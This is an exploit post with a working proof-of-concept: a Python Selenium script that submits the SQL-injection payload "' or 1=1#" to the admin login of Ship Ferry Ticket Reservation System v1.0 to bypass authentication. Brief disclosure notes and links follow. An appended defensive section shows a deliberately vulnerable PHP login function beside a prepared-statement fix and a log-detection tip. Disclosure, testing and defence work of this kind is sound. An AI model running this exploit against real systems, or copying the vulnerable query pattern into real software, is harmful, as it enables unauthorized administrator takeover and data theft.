### Exploit Title: Ship Ferry Ticket Reservation System v1.0 SQL-Injection-Bypass-Authentication in /ship_ticketing/classes/Login.php
### Author: nu11secur1ty
### Testing and Debugging: nu11secur1ty
### Date: 08.30.2021
### Vendor: https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html
### Link: https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html
### CVE: CVE-nu11-02

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Development: @nu11secur1ty
# CVE-nu11-02
from selenium import webdriver
from selenium.webdriver.common.by import By
import time

# Link to the login page you want to automate.
website_link = "http://localhost/ship_ticketing/admin/login.php"

# Login username (the injection payload).
username = "nu11secur1ty' or 1=1#"

# Login password (same payload).
password = "nu11secur1ty' or 1=1#"

# name attribute of the username input field.
element_for_username = "username"

# name attribute of the password input field.
element_for_password = "password"

browser = webdriver.Chrome()
browser.get(website_link)

try:
    # find_element(By.NAME, ...) replaces the find_element_by_name() helper
    # that was removed in Selenium 4.
    username_element = browser.find_element(By.NAME, element_for_username)
    username_element.send_keys(username)
    password_element = browser.find_element(By.NAME, element_for_password)
    password_element.send_keys(password)
    browser.maximize_window()
    time.sleep(1)
    browser.execute_script("document.querySelector('[class=\"btn btn-primary btn-block\"]').click()")
    print("The payload for CVE-nu11-02 is deployed...\n")
except Exception:
    # This exception occurs if the elements are not found on the webpage.
    print("Some error occurred :(")

------------------------------------------------------------------

### Remote vulnerable link execution:
http://localhost/ship_ticketing/admin/login.php

### Description:
The Ship/Ferry Ticket Reservation System v1.0 is vulnerable to SQL-injection authentication bypass in /ship_ticketing/classes/Login.php (more info: https://portswigger.net/support/using-sql-injection-to-bypass-authentication). The username parameter of the login form is not validated or escaped before it is placed in the query, so nothing protects it from malicious payloads. A user who sends a malicious query or payload to the MySQL server can bypass the login credentials and take control of the administrator account.

### Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CVE-nu11-02

### Proof:
https://streamable.com/h65olk

### BR
nu11secur1ty
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
https://www.nu11secur1ty.com/
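As an added illustration (not the vendor's Login.php, whose source is not reproduced here), this is the string-concatenation query pattern that the payload above defeats, shown next to a prepared-statement fix; the mysqli connection `$conn`, the `users` table and its column names are assumptions.

```php
<?php
// Added example: the unsafe pattern behind an SQL-injection login bypass and its fix.
// Assumes a mysqli connection $conn and a table users(id, username, password).

// VULNERABLE: the username is interpolated straight into the SQL text.
// With username = "nu11secur1ty' or 1=1#" the query becomes
//   SELECT * FROM users WHERE username = 'nu11secur1ty' or 1=1#' AND password = '...'
// MySQL treats '#' as the start of a comment, so the password check is discarded
// and "or 1=1" makes the WHERE clause true for every row: the first user
// (typically the administrator) is returned without a valid password.
function login_vulnerable(mysqli $conn, string $username, string $password): ?array
{
    $sql = "SELECT * FROM users WHERE username = '" . $username
         . "' AND password = '" . md5($password) . "'";
    $result = $conn->query($sql);
    if ($result === false) {
        return null;
    }
    $row = $result->fetch_assoc();
    return $row ?: null;
}

// FIXED: a prepared statement binds the username as data, never as SQL syntax,
// so quote characters and '#' have no effect on the query structure. The
// password is checked with password_verify() against a stored password_hash().
function login_fixed(mysqli $conn, string $username, string $password): ?array
{
    $stmt = $conn->prepare("SELECT id, username, password FROM users WHERE username = ?");
    $stmt->bind_param("s", $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    if ($row === null || !password_verify($password, $row['password'])) {
        return null; // unknown user or wrong password: same result either way
    }
    unset($row['password']); // never hand the hash back to the caller
    return $row;
}
```

Detection note: the injected username reaches the database verbatim in the vulnerable version, so login attempts containing quote characters or comment markers in the username field are worth flagging in web-server and database query logs.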